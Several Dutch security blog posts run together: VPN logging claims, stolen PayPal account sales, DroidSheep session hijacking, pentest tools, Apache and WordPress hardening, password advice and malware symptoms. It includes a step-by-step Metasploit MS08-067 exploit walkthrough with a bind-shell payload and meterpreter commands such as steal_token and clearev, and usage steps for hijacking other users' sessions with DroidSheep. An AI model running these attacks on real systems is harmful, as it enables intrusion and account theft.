Als je veel gebruik maakt van hot-spots dan raad ik het aan om echt gebruik te maken van een VPN service. Het is al meerdere malen bewezen dat je niet veilig bent op hot-spots en vooral die gratis internet aanbieden, neem als voorbeeld McDonalds of in de trein. Je gegevens kunnen zo onderschept worden.

Onderstaande VPN services hebben gezegd dat ze echt niets loggen. Natuurlijk kun je nooit 100% weten zonder in hun systemen te kijken dus moeten we hun woorden vertrouwen. Onder elke service staat wat ze zelf hebben gezegd.

BTguard

“It’s technically unfeasible for us to maintain log files with the amount of connections we route,” BTguard explain. “We

estimate the capacity needed to store log files would be 4TB per day.”

Proxy 5,33 euro per maand
VPN 7,63 euro per maand

http://btguard.com/

ItsHidden

“No logs, they are not kept. Even system logs that do not directly link to users are rotated on an hourly basis.”

9,99 Dollar per maand
eenmalig 12.99 Dollar voor 1 maand
eenmalig 24,99 Dollar voor 3 maanden
eenmalig 44,99 Dollar voor 6 maanden

http://itshidden.com/

Ipredator

“We don’t store the IP at all actually. It’s in temporary use for the session you have when you’re connected but that’s it. We’ve had very few issues with not having logs, but not keeping them makes it safer even for us since we can’t accidentally give out information about anyone.”

15 Euro voor 3 maanden

https://www.ipredator.se/

Faceless

 “We do not log any IP addresses and no information about what data is accessed by our users, so we have no information that could be interesting to third-parties.”

9.95 Dollar per maand
19,95 Dollar voor 3 maanden

http://faceless.me/

BlackVPN

“We do not keep any logs about our users internet activities including which sites they access or what data they transfer. We also run log cleaners on our systems which removes the IPs from logs before they are written to disk,” the company told TorrentFreak.

“For tax and legal reasons we do store some billing information (name, email, country), but it is stored with a third-party and separate from the rest of BlackVPN.”

BlackVPN say they hold a username and email address of their subscribers and the times of connection and disconnection to their services along with bandwidth consumption. Logging is carried out as follows:

“On our Privacy Servers, NL & LT we don’t log anything that can identify the user, but on our US & UK server where we don’t allow sharing copyrighted materials we do log the internal RFC1918 IP that is assigned to the user at a specific time,” BlackVPN explain.

“So to clarify, we don’t log the real external IP of the user, just our RFC1918 internal one, this we have to do to comply with local laws and to be able to handle DMCAs.”

TVPackage voor 7,50 per maand
Privacy package voor 7,50 per maand
Global package voor 9,50 per maand
Één server naar keuze  voor 5 euro per maand

https://www.blackvpn.com/

Mullvad

“No. And we don’t see why anyone would. It would be dishonest towards our customers and mean *more* potential legal trouble.”

5 euro per maand

http://mullvad.net/en/

Bron: TorrentFreak

Volgens de informatie die verstreken is door Brian Krebs worden honderden gehackt Paypal accounts voor ene lage prijs verkocht. Niet-geverifieerde accounts worden per 100 stuks verkocht voor maar liefst 50$, 0,50$ per account is niet veel maar let wel op niet-geverifieerde accounts zijn accounts die niet verbonden zijn aan bank of credit-card. Dit betekend dat de hacker alleen is verbonden aan de saldo dat op de account staat, dus op=op.

Bij geverifieerde accounts ligt het weer anders, deze worden per stuk verkocht vanaf 2,50$ als de account meer dan 10$ heeft gaat de prijs omhoog. een account met 1000$ wordt makkelijk verkocht voor 45$. Je leest het goed 45$, zo goedkoop.

Nu vraag je wel af hoe deze accounts worden verkocht, nou simpel via een website en je raad het je betaalt met je Paypal account. Website is gelukkig voor nou offline gehaald, waarschijnlijk door de hosting. Hieronder is de screenshot van deze website.

Zoals te zien is op de screenshot zijn niet alleen de mail adressen zichtbaar maar ook woonplaats en naam. Nu alle mail adressen zichtbaar zijn zou het logisch zijn dat Paypal deze adressen doorneemt en de accounts die verbonden zijn aan die account blokkeren zodat er geen misbruik van gemaakt wordt.

Brian denkt dat deze accounts gestolen zijn door middel van Phishing aanvallen en Trojans die op de computer van de doelwit bevindt. Site waar alle gestolen accounts opstaan was al een tijdje actief en is onbekend hoeveel deze persoon winst van gemaakt heeft. Gelukkig is de website niet meer online, maar voor hoelang?

Zoals te zien is worden onderschepte accounts voor bijna niets verkocht, persoonlijk had ik wel een hogere bedrag verwacht. Maar dit laat zien dat veel Paypal accounts gestolen worden zonder dat de gebruiker op de hoogte van is. Neem daarom de juiste maatregelen en log niet overal op je Paypal account.

Bron: krebsonsecurity

Het gebruik van DroidSheep is heel simpel, zoals de beschrijving het al zegt je hoeft maar op 1 knop te klikken namelijk START. Hierna gaat de applicatie het netwerk scannen en geeft de sessies van websites weer. Als je een sessie wilt overnemen hoef je alleen op de site te klikken en vervolgens op “Open Site”. Dit zal de ingebouwde browser openen met de sessie van een ander gebruiker. In principe ben je ingelogd als de slachtoffer zonder dat diegene het weet. Je kunt, zoals eerder geciteerd, vergelijken met FireSheep en Faceniff. Faceniff was alleen voor Facebook sessies.

Wat heb je nodig

- Een android toestel of tablet met android 2.1+
- Root toegang
- En natuurlijk Droidsheep

Ik heb in het kort DroidSheep getest en het werkte vrij snel en simpel, ik had o.a. sessies van Facebook en WordPress onderschept. Het werkte (gelukkig) niet op google sessies. Iedereen kan er gebruik van maken zonder enig kennis te hebben van hacken en dit maakt deze applicatie juist gevaarlijk.

Wat kun je hiertegen doen? dat zal de eerste vraag zijn van gebruikers. Als eerst vergeet nooit op “uitloggen” te klikken als je klaar bent, dit zal je sessie beëindigen en kan er niet meer misbruik van gemaakt worden. Als je een gratis internet toegang hebt let op wat je erop doet, als jij toegang hebt betekend dit dat ook anderen toegang op kunnen hebben met kwaadaardige bedoelingen. Als je een draadloze router hebt maak dan gebruik van WPA2 en GEEN WEP. Zo kun je tegengaan dat iemand onbevoegd toegang verleent tot je netwerk.

DroidSheep is niet gemaakt om andermans identiteit te stelen maar om aan te geven dat veel sites maar dan ook echt de meerderheid gevoelig zijn voor dit soort aanvallen. Gebruik deze applicatie dan ook alleen voor test doeleinden.

IK BEN NIET VERANTWOORDELIJK VOOR DE GEVOLGEN VAN DEZE APPLICATIE!

Download Droidsheep: http://droidsheep.de/?page_id=23

Hieronder een instructie video voor het installeren van Firesheep:

Met de juiste kennis en gebruik van deze applicaties zul je merken hoe krachtig een simpel applicatie kan zijn. Als je geen verstand hebt van deze applicaties raad ik het aan om voorbeelden op te zoeken en te oefenen. Gebruik deze applicaties wel alleen voor testdoeleinden.

Nmap

Je hebt waarschijnlijk veel gehoord van Nmap wat geen verassing is. Het kan op eerste instantie op een simpele poort scanner lijken maar Nmap gaat een stap verder. Alle pakketten worden geanalyseerd en zo kan Nmap achterhalen welke OS er gebruikt wordt met de services. Nmap is beschikbaar in commandline als zowel in grafische omgeving.

Metasploit Framework

Metasploit is een bekend framework die door duizenden mensen gebruikt wordt. Als je informatie zoekt over hacken dan zul je gegarandeerd Metasploit tegenkomen. Metasploit Framework bevat al zelf honderden bekende kwetsbaarheden maar het houd hier niet op deze framework wordt ook gebruikt om eigen kwetsbaarheden te schrijven.

Nessus

Nessus is misschien een van de bekendste audit tools die er is, het wordt al ondertussen gebruikt door meer dan 75.000 bedrijven over de wereld. Je kunt met Nessus makkelijk en snel naar kwetsbaarheden zoeken op severs, computers en applicaties. Zodra je gebruik gaat maken van Nessus zul je merken hoe makkelijk alles zal gaan.

Nikto

Nikto is een server scanner die naar kwetsbaarheden scant op web servers. Tijdens het scan voert Nikto verschillende scripts uit om de kwetsbaarheid te testen. Je kunt Nikto ook uitbreiden d.m.v. Plugins.

THC Amap

THC Amap is een nieuw soort applicatie om penetratie testen uit te voeren op een netwerk. Het doel van Amap is om snel en betrouwbaar informatie te geven op protocol niveau.

Ethereal

Veel netwerk beheerders maken al gebruik van deze applicatie. Ethereal wordt vooral gebruikt voor analyse, troubleshooting en nieuwe protocol en software implementatie. Ethreal is een protocol analyzer die alle opties bevat die je verwacht en zelfs nog meer.

THC Hydra

Als eerste wat je leert is dat een wachtwoord krachtig moet zijn en niet makkelijk te kraken. Met Hydra kun je controleren of gebruikers geen gebruik maken van kwetsbare wachtwoorden. Hydra is dus een wachtwoord kraker die snel en betrouwbaar is plus het ondersteund meerdere protocollen en is makkelijk uit te breiden d.m.v. modules.

John the Ripper

Naast Hydra hebben we ok John the Ripper. John detecteert zwakke wachtwoorden door naar hashes te kijken van o.a. naar Windows hashes en Kerberos AFS en natuurlijk ook naar vele andere hashes.

Verberg apache-versie en alle andere gevoelige informatie

Als je een apache webserver hebt geïnstalleerd kunnen internetgebruikers de versie van je apache opvragen, samen met je operating system (OS). Je zou denken dat het niet uitmaakt als anderen mijn apache-versie weten. Het risico bestaat echter dat een hacker exploits kan zoeken op de versie van je apache en als je vergeten bent om het te updaten kan het kwetsbaar zijn. Je kunt dit uitschakelen door een kleine aanpassing te brengen aan je config. Zoek naar httpd.conf en open die met je favoriete tekst editor en zoek of voeg de volgende lijnen toe:

ServerSignature off
ServerTokens Prod

ServerSignature Komt te staan als door apache automatisch genereerde pagina’s te voorschijn komen zoals 404 pagina’s.

ServerTokens stuurt met http een response met de huidige versie en OS van apache. Door het op Prod te zetten stuurt apache alleen “Apache” waardoor hackers geen informatie krijgen van e Apache versie of je OS. Als je ook niet wilt dat Apache te komen staat dan moet je de source van Apache aanpassen zo kun je hackers ook misleiden.

Ben er zeker van dat apache onder zijn eigen gebruiker en groep draait

Bij sommige apache installaties draait Apache met de gebruiker “nobody”. Het is veiliger om een eigen gebruiker aan te maken voor Apache, dit zorgt voor een beter beveiliging voor je systeem. Als je meerdere services hebt draaien met nobody en als er een van die services overgenomen wordt door een kwetsbaarheid dan zijn gelijk alle services overgenomen. Je kunt dit aanpassen in httpd.conf:

User apache
Group apache

Nu moet je apache opnieuw opstarten. Als deze gebruiker en groep niet bestaat zal apache ook niet starten.

Zorg ervoor dat gebruikers niet buiten de webroot kunnen komen

Apache maakt een webroot aan standaard /var/www. Je wilt dan dat gebruikers niet buiten deze map komen want dan krijgen ze toegang tot je server bestanden en dit wil iedereen voorkomen. Dit is makkelijk op te lossen door je apache instellingen aan te passen. Hier onder is een voorbeeld voor je webroot instellingen (we gaan ervan uit dat /var/www je webroot is):

<Directory /> 
   Order Deny, Allow 
   Deny From All 
   Options None 
   AllowOverride None
</Directory>
<Directory /var/www> 
   Order Allow, Deny 
   Allow from all
</Directory>

Schakel directory listing uit

Met directory listing hebben gebruikers de mogelijkheid een overzicht te krijgen van de inhoud van een map. Dit is niet wat we willen tenzij je wilt dat gebruikers een inzage hebben. Om deze optie uit te zetten moet je weer naar je instellingen kijken van je webroot en er een optie erbij zetten:

Options –includes

Gebruik mod_security

mod_security is een Apache module die je kan helpen bij het beveiligen van je Apache server, mod_security is geschreven door Ivan Ristic die ook de schrijver is van Apache security voor O’reilly. Met Mod_security kun je het volgende doen:

-         Simple filtering
-         Reguliere expressie filtering
-         URL encoding validatie
-         Unicode Encoding validatie
-         Auditing
-         Null byte aanval preventie
-         Upload memory limit
-         Server identity masking
-         En nog meer

Schakel ongebruikte modules uit

Met Apache komen een paar standaard modules die je waarschijnlijk niet allemaal nodig zult hebben. Je kunt meer over Modules lezen Module documentatie er staat ook uiteg erbij over de modules zo weet je wat een module doet en dan kun e beslissen of je het nodig hebt of niet. Eerst moet je kijken welke modules er standaard geladen worden deze kun je vinden in httpd.conf bestand. Lijnen die starten met LoadModule zijn de modules die geladen, waar een # voor staat worden niet geladen. Om een snel overzicht te krijgen over modules die geladen worden kun je grep gebruiken (we gaan ervan uit dat je op dezelfde locatie bevind als de httpd.conf):  

Grep LoadModule httpd.conf

Chown –R root:root /usr/local/apache
Chmod –R o-rwx /usr/local/apache

Timeout 45

LimitRequesBody 1048576

Order Deny, Allow
Deny from all
Allow from 176.16.0.0/16

Order Deny,Allow
Deny from all
Allow from 127.0.0.1

SecChrootDir /chroot/apache

BT 5 is gebasseerd op Ubuntu Lucid (10.04 LTS) en zal zowel 32bit als 64bit gaan ondersteunen. Er is ondersteuning voor KDE 4, Cnome en Fluxbox door middel van downloadbare ISO bestanden van iedere desktop omgeving. Alle beschikbare tools werken naadloos samen met alle desktop omgevingen, dus ook het start menu.

Misschien wel de meest belangrijke aanpassing aan BackTrack revolution is dat dit de eerste versie is waarvan de volledige broncode in de repositories zit. Dit houdt in dat BackTrack 5 revolution nu officieel tot de open-source groep hoort. Bij versie 4 waren er nog enkele license problemen.

BackTrack 4 was niet volledig open-source omdat er niet voldoende bronnen waren om gebruik van te maken tijdens de ontwikkeling van de BT4 ontwikkelomgeving. Om toch volledig open-source te worden hebben ze de handen ineen geslagen met Offensive Security. Samen met hun hebben ze een nieuwe “degelijke” ontwikkelomgeving gebouwd. Naar eigen zeggen kunnen ze hier best wel waanzinnige dingen mee.

De lijst met tools is compleet bijgewerkt een aangepast. Ze hebben iedere tool opnieuw getest op functionaliteit en hebben aan de hand van die resultaten besloten of deze wel of niet in BT5 zou terugkeren. Uiteraard hebben ze ook nieuwe tools getest en, wanneer goed genoeg, toegevoegd aan de repositories. Ook de menustructuur is geoptimaliseerd. Aan de hand van de PTES en OSSTMM standards hebben ze de menustructuur strakker en simpeler gemaakt. Hierdoor zou men makkelijker de benodigde tools kunnen vinden.

Ook de roadmap is eindelijk bijgewerkt en hebben ze de releasedatum van BackTrack 5 “revolution” vastgesteld, 10 mei 2011 is het zo ver!

Mocht je nog tools weten dan mag je deze aan hun doorgeven door middel van een formulier op onderstaande link. Dit is vanaf nu nog 4 weken. Let wel op dat deze tools niet in BackTrack 4 moeten zitten.

Bron: BackTrack-Linux.org

Plugin map is te vinden op {Wordpress root}/wp-content/plugins. In oudere versies van WordPress was deze map niet goed beveiligd, maar in meest recente versies is het al beter beveiligd. Makkelijkste manier om het te beveiligen is om een lege HTML bestand aan te maken genaamd index.html, dit zal ervoor zorgen dat ze niet makkelijk in die map kunnen kijken. Controleer of deze bestand te vinden is.

2 Verberg WordPress versie

Als een kwaadwillende persoon de versie van je WordPress weet maakt dit hem makkelijker op kwetsbaarheden te zoeken. Standaard geeft WordPress het weer. Met een simpele aanpassing aan het script kun je ervoor zorgen dat dit niet meer zichtbaar is. Zoek naar het header.php en verander het volgende lijn:

<meta name=”generator” content=”WordPress <?php bloginfo(“version”); ?>” />

naar:

<meta name=”generator” content=”WordPress” />

3 gebruik een sterke wachtwoord

Ik weet dat dit wel logisch kan zijn voor sommige, maar ik wil er nog op duiden dat het echt belangrijk is. Tot WP 3.0 was de standaard gebruiker admin, tegenwoordig kun je nu je eigen gebruikersnaam creëren, dit maak niet per direct veilig maar maakt het kans op brute force kleiner. Gebruik ook geen simpele wachtwoord zoals een datum of een woord die makkelijk te vinden is in een woordenboek. Je kunt het beste letters combineren met cijfers, dit zal ervoor zorgen dat het moeilijker wordt om een succesvolle brute force op uit te voeren.

4 verander regelmatig je wachtwoord

Persoonlijke wachtwoorden worden niet regelmatig veranderd en er wordt ook overal hetzelfde wachtwoord gebruikt. Dit betekend dat als er maar op een site je wachtwoord onderschept wordt, deze op alle sites succesvol toegepast kan worden.

5 hou je plug-ins up-to-date

Normaliter zal WordPress aangeven als er updates zijn voor plug-ins die je gebruikt. Zorg ervoor dat je dit ook doet want er kunnen kwetsbaarheden bekend zijn van oudere plug-ins die misbruikt kunnen worden. Er is natuurlijk ook een kans als je update dat er nieuwe kwetsbaarheden plaats kunnen vinden die nog gevonden moeten worden. Je hebt altijd het risico.

6 maak gebruik van een secret key

Het is raar maar WordPress slaat je gegevens (gebruikersnaam, wachtwoord en database adres) op in platte tekst, dit is natuurlijk niet slim. WordPress heeft hiervoor een oplossing, maar voor een of ander reden weten veel dit niet. WordPress project heeft hiervoor een “secret key”. Volg deze link en genereer een key, zet de gegevens bij gebruiker(user) wachtwoord(password) en adres(adress) velden.

7 Back-up

Het kan altijd voorkomen dat er iets mis gaat, zorg er dan voor dat je een back-up hebt. Als je regelmatig back-ups bijhoud dan zul je er ook zeker van zijn dat je niks kwijt zal raken. Als je op google zoekt zul je genoeg tools vinden die je hierbij kunnen helpen. Ik zelf maak gebruik van “backupify”.

8 beperk foutieve inlog pogingen

Maak gebruik van een plugin zoals “Login LockDown” om ervoor te zorgen dat een persoon niet te vaak foutief probeert in te loggen. Dit is weer een middel om tegen brute force aanvallen te gaan of dat mensen niet proberen om je wachtwoord te raden. Login LockDown monitort het aantal foutieve inlog pogingen en als het te vaak voorkomt komt het IP in de blacklist en kan deze persoon niet meer inloggen.

9 Scan naar kwetsbaarheden

“WP security scan” en “WordPress Scanner” zijn twee plugins die je WordPress installatie, plugins, thema’s etc controleren voor kwetsbaarheden. Maak er gebruik van.

1. 123456
2. 12345
3. 123456789
4. Password
5. iloveyou
6. princess
7. rockyou
8. 1234567
9. 12345678
10. abc123

Dit onderzoek heeft in amerika plaats gevonden maar het zal niet veel verschillen in Nederland, natuurlijk kan “password” wachtwoord zijn. Mensen moeten echt begrijpen dat een wachtwoord keuze een grote rol kan hebben bij het veiligheid van je account. Ik krijg meestal als antwoord dat ze het dan niet goed kunnen ontouden omdat het dan te lastig wordt, dit is niet helemaal als je het vaak genoeg gebruikt zal het na een tijdje automatisch gaan. Ik heb zelf tientallen wachtwoorden en ik weet meeste uit mijn hoofd en als ik er eentje niet weet heb ik een wachtwoord manager. Hieronder zijn een aantal tips voor een sterk wachtwoord:

• Maak een wachtwoord die bestaat uit minimaal 8 karakters. Een wachtwoord die langer is dan 8 karakters zal er voor zorgen dat het bruteforcen lastiger wordt. Bruteforce probeert allerlei verschillende wachtwoord totdat de juiste wordt gevonden.
• Zorg ervoor dat je wachtwoord niet makkelijk te raden is. Dit betekend dat je geen gebruik moet maken van namen. Meeste gebruiken namen van hun huisdier, geboorte datum of telefoon nummer, dit is niet slim om te gebruiken. Als iemand je al een beetje kent, kan deze hier heel snel achterkomen.
• Gebruik geen woorden die vindbaar zijn in een woordenboek. Je kunt tegenwoordig een woordenboek digitaal downloaden en dit wordt ook gebruikt bij bruteforce aanvallen. Tijdens een bruteforce wordt gebruik gemaakt van digitale woordenboeken om de woorden die erin staan te gebruiken om wachtwoorden te achterhalen.
• Gebruik geen simpele combinaties van cijfers/letters bijvoorbeeld: 77777, 12345 of abcde.
• Maak een wachtwoord die uit verschillende karakters bestaat zoals letters, cijfers en speciale tekens. Hoe meer je gebruik maakt van verschillende karakters hoe lastiger het is om het te kraken.
• Gebruik voor verschillende sites andere wachtwoorden, zodat wanneer de site gehacked wordt de hacker niet beschikt over andere wachtwoorden van bijvoorbeeld je mail.
• Verander regelmatig je wachtwoord, wanneer een persoon dan achter je wachtwoord komt kan hij deze niet lang gebruiken.
• Gebruik een goede wachtwoord manager, niet die standaard in je browser zit.

Ik hoop dat het doordringt bij mensen dat wachtwoord keuze een belangrijke rol heeft bij het kraken van wachtwoorden en dat je account overgenomen wordt. Dit is niet alles maar is wel een grote stap.

Om dit uit te voeren heb je de volgende applicaties nodig:

- Metasploit

- Nmap

Je kunt het ook zonder nmap doen maar dan weet je niet zeker of je exploit gaat werken.

Uitgevoerde commando bij Nmap is:

nmap -PN -T4 -p139,445 -n -v –script smb-check-vulns,smb-os-discovery –script-args unsafe=1 192.168.178.33

Vergeet wel niet het IP adres te veranderen aan het eind

Uigevoerde opdrachten in Metasploit:

use windows/smb/ms08_067_netapi

set payload generic/shell_bind_tcp

Set Rhost 192.168.178.33

exploit

Uitleg opdrachten:

use windows/smb/ms08_067_netapi: is het exploit die we gaan gebruiken. smb (service message block) wordt gebruikt om gedeelte mappen en printers te delen over het netwerk.

set payload generic/shell_bind_tcp: payload wordt gebruikt om data te verzenden over het netwerk en met deze commando gaan we verbinding maken met het command interface die door TCP protocol gaat.

set Rhost 192.168.178.33: hier stellen we het IP adres in van de server waar we het exploit op willen gebruiken. Vergeet hier niet om het IP adres te veranderen.

exploit: ik denk dat dit wel voor zich spreekt.

Als het succesvol is kom je in “meterpreter” vanuit hier kun je opdrachten doorgeven: hieronder is de help bestand:

Core Commands

Command Description

? Help menu

background Backgrounds the current session

bgkill Kills a background meterpreter script

bglist Lists running background scripts

bgrun Executes a meterpreter script as a background thread

channel Displays information about active channels

close Closes a channel

exit Terminate the meterpreter session

help Help menu

interact Interacts with a channel

irb Drop into irb scripting mode

migrate Migrate the server to another process

quit Terminate the meterpreter session

read Reads data from a channel

run Executes a meterpreter script

use Load a one or more meterpreter extensions

write Writes data to a channel

Stdapi: File system Commands

cat Read the contents of a file to the screen

cd Change directory

del Delete the specified file

download Download a file or directory

edit Edit a file

getlwd Print local working directory

getwd Print working directory

lcd Change local working directory

lpwd Print local working directory

ls List files

mkdir Make directory

pwd Print working directory

rm Delete the specified file

rmdir Remove directory

search Search for files

upload Upload a file or directory

Stdapi: Networking Commands

ipconfig Display interfaces

portfwd Forward a local port to a remote service

route View and modify the routing table

Stdapi: System Commands

clearev Clear the event log

drop_token Relinquishes any active impersonation token.

execute Execute a command

getpid Get the current process identifier

getprivs Get as many privileges as possible

getuid Get the user that the server is running as

kill Terminate a process

ps List running processes

reboot Reboots the remote computer

reg Modify and interact with the remote registry

rev2self Calls RevertToSelf() on the remote machine

shell Drop into a system command shell

shutdown Shuts down the remote computer

steal_token Attempts to steal an impersonation token from the target process

sysinfo Gets information about the remote system, such as OS

Als iets niet duidelijk is of vragen hebt kun je altijd contact opnemen

Als je een beetje verstand hebt van computers kun je nog merken dat je geïnfecteerd bent. Maar de meeste gebruikers hebben niet zoveel verstand en zullen het niet snel doorhebben. Dit heeft niets met de gebruiker te maken maar meer dat de meeste bedreigingen zo gemaakt om niet op te vallen.

PandaLabs heeft een lijstje gemaakt met de 10 meest voorkomende symptomen als je besmet bent. Dit zal gebruikers alerter maken en sneller begrijpen dat ze besmet zijn.

1. Computer praat tegen je: Je krijgt regelmatig pop-ups meldingen dat je computer besmet is en dat je het schoon moet maken en je computer beschermen. Dit is een van de meest voorkomende kwaal. Je bent dan waarschijnlijk besmet door spyware of een namaak anti-virus (ook wel “rogueware” genoemd). Meestal moet je je creditcard gegevens invullen om een betaalde versie te krijgen om van alle virussen af te komen. Doe dit nooit.

2. Mijn computer is extreem langzaam: Als je pc langzamer werkt dan normaal, dit kan een symptoom zijn van meerdere oorzaken. Als je besmet bent door een Virus, Worm, Trojan dan kan je pc ook langzamer werken. Dit komt omdat deze besmetting vormen op de achtergrond werken waardoor je systeem langzamer van kan worden.

3. Applicaties starten/werken niet meer: het kan voorkomen dat je sommige applicaties niet meer kunt starten maakt niet uit hoe vaak je je pc opnieuw hebt gestart of meerdere malen geprobeerd hebt. Dit kan ook een teken zijn dat er iets mis is.

4. Ik krijg geen verbinding met het internet of is langzaam: Een zwakke internet verbinding is ook een van de meest voorkomende symptomen. Je moet wel niet te snel concluderen dat er iets mis is met je pc, de oorzaak kan ook altijd je provider of je router zijn. Als het gaat om een besmetting dan kan je internet ook langzaam zijn. Dit komt omdat malware ook verbinding maakt met het internet en meerdere sessies start. Dit zorgt ervoor dat er op de achtergrond data verwerkt wordt en je bandbreedte gebruikt.

5. Tijdens het surfen op het web krijg je ongewenste reclames en pagina’s: Dit is een ander teken van bepaalde infecties. Meeste bedreigingen zijn zo gemaakt dat ze je verbinding manipuleren en je naar andere sites sturen en zelfs sites namaken. Soms kan het zelfs voorkomen dat je het niet eens merkt dat je op een valse site zit.

6. Waar zijn mijn bestanden: Ik hoop dat niemand te maken krijg met dit soort infecties. Het kan nog altijd voorkomen dat je besmet wordt met een virus die gegevens verwijderd. Als dit voorkomt dan zou ik me echt zorgen maken.

7. Anti-virus is weg en firewall is werkt niet meer: Wat ook nog veel voorkomt is dat wanneer je besmet wordt je anti-virus verwijderd en je firewall uitgeschakeld wordt. Dit betekend dan dat je helemaal niet meer beschermd bent en zo virussen, malware, trojan zijn werk rustig kan doen.

8. Computer praat in een ander taal: Als de taal van bepaalde applicaties veranderd of het is niet fatsoenlijk nederlands dan kun je van zeker zijn dat je besmet bent.

9. Er verdwijnen bestanden die nodig zijn voor applicaties/games: je hoeft er niet lang over na te denken, dit is ook een teken van besmetting.

10. Computer is gek geworden: Als je pc activiteiten verricht waar je niks mee te maken hebt zoals dat er mails gestuurd worden, berichten gestuurd worden naar je vrienden, opent internet pagina’s. Dan kun je zeker van zijn dat je besmet bent